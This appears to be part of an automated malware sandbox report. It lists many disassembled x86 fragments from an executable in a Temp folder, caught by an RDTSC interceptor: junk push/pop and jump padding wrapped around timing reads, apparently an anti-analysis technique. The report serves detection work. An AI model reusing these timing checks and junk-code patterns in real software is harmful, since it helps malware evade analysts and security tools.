                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A3A6 second address: 57A3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A3AA second address: 57A3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD529Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F29F0CD52A6h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F29F0CD5296h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A3DF second address: 57A3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F29F0C52763h 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A3F9 second address: 57A3FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A3FF second address: 57A413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F29F0C52756h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 581163 second address: 58117F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A8h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58117F second address: 5811A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29F0C52765h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0C5275Bh 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57FC4A second address: 57FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 504C3F second address: 504C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 580A25 second address: 580A2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 580A2B second address: 580A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F29F0C5275Eh 0x0000000c jnp 00007F29F0C52756h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F29F0C52766h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 580A59 second address: 580A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 524C18 second address: 524C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29F0C52756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 524C24 second address: 524C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jng 00007F29F0CD5296h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F29F0CD529Ah 0x00000015 jmp 00007F29F0CD52A3h 0x0000001a ja 00007F29F0CD5296h 0x00000020 popad 0x00000021 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 580FC2 second address: 580FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 580FC6 second address: 580FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F29F0CD52A7h 0x00000013 jmp 00007F29F0CD529Bh 0x00000018 jno 00007F29F0CD5296h 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58578D second address: 5857BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29F0C52756h 0x0000000a jnl 00007F29F0C52756h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F29F0C52756h 0x00000019 jmp 00007F29F0C52768h 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5857BE second address: 5857E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F29F0CD5296h 0x00000016 jmp 00007F29F0CD529Ch 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5857E7 second address: 58580A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F29F0C52769h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58580A second address: 585812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585812 second address: 585816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585816 second address: 58581A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5456A9 second address: 5456AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 545C1A second address: 545C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 545C1E second address: 545C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 546098 second address: 5460EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5298h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F29F0CD52A8h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F29F0CD5298h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 0000001Eh 0x0000002f sub cx, 8CC1h 0x00000034 nop 0x00000035 push ebx 0x00000036 push edi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5463C6 second address: 5463CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5463CC second address: 5463D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585AAC second address: 585AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52766h 0x00000007 jmp 00007F29F0C52760h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0C52760h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585AEA second address: 585AF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585AF4 second address: 585B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29F0C52767h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F29F0C5275Eh 0x00000015 jo 00007F29F0C52756h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F29F0C5275Fh 0x00000025 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585B3E second address: 585B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585B44 second address: 585B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 585F52 second address: 585F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD529Ah 0x00000009 jmp 00007F29F0CD52A9h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29F0CD529Dh 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 586104 second address: 58611A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jno 00007F29F0C52756h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58611A second address: 586148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29F0CD52A9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F29F0CD529Ch 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 586148 second address: 586161 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0C52758h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b jmp 00007F29F0C5275Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5865FD second address: 586601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 586601 second address: 586607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 588ECD second address: 588ED7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0CD529Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 588ED7 second address: 588EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F29F0C52756h 0x0000000c jl 00007F29F0C52756h 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58B66D second address: 58B6ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F29F0CD529Eh 0x00000010 jnp 00007F29F0CD5296h 0x00000016 jmp 00007F29F0CD529Fh 0x0000001b popad 0x0000001c pop ebx 0x0000001d pushad 0x0000001e jmp 00007F29F0CD529Dh 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F29F0CD52A4h 0x0000002b jmp 00007F29F0CD529Eh 0x00000030 jmp 00007F29F0CD52A9h 0x00000035 popad 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB29 second address: 58BB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB31 second address: 58BB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB3F second address: 58BB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007F29F0C52756h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB55 second address: 58BB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A27 second address: 590A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A2D second address: 590A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A2h 0x00000007 jmp 00007F29F0CD529Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F29F0CD5296h 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A55 second address: 590A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58FD74 second address: 58FD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58FD78 second address: 58FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F29F0C5276Ch 0x0000000c jmp 00007F29F0C52760h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5902AA second address: 5902E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 jmp 00007F29F0CD52A2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A8h 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5902E8 second address: 5902EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590422 second address: 590436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F29F0CD5296h 0x0000000b jl 00007F29F0CD5296h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590436 second address: 590462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52763h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F29F0C52763h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590462 second address: 590491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29F0CD52A2h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5950F3 second address: 595113 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0C52756h 0x00000008 jmp 00007F29F0C52766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947D4 second address: 5947DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947DA second address: 5947DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947DF second address: 5947EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594976 second address: 594986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F29F0C52756h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594DAF second address: 594DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594DB7 second address: 594E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52767h 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F29F0C52769h 0x00000012 pop ebx 0x00000013 ja 00007F29F0C52758h 0x00000019 popad 0x0000001a jbe 00007F29F0C52776h 0x00000020 jo 00007F29F0C5275Ch 0x00000026 jng 00007F29F0C52756h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594E0F second address: 594E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594E15 second address: 594E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A595 second address: 59A5CA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0CD5296h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 jno 00007F29F0CD5296h 0x00000017 pop eax 0x00000018 jmp 00007F29F0CD52A6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pop esi 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A724 second address: 59A747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29F0C52767h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A747 second address: 59A77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A4h 0x0000000a jl 00007F29F0CD5298h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29F0CD529Eh 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A77B second address: 59A785 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A785 second address: 59A7A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0CD52ADh 0x00000008 js 00007F29F0CD5296h 0x0000000e jmp 00007F29F0CD52A1h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A926 second address: 59A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A92A second address: 59A92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A92E second address: 59A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A937 second address: 59A94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD529Dh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
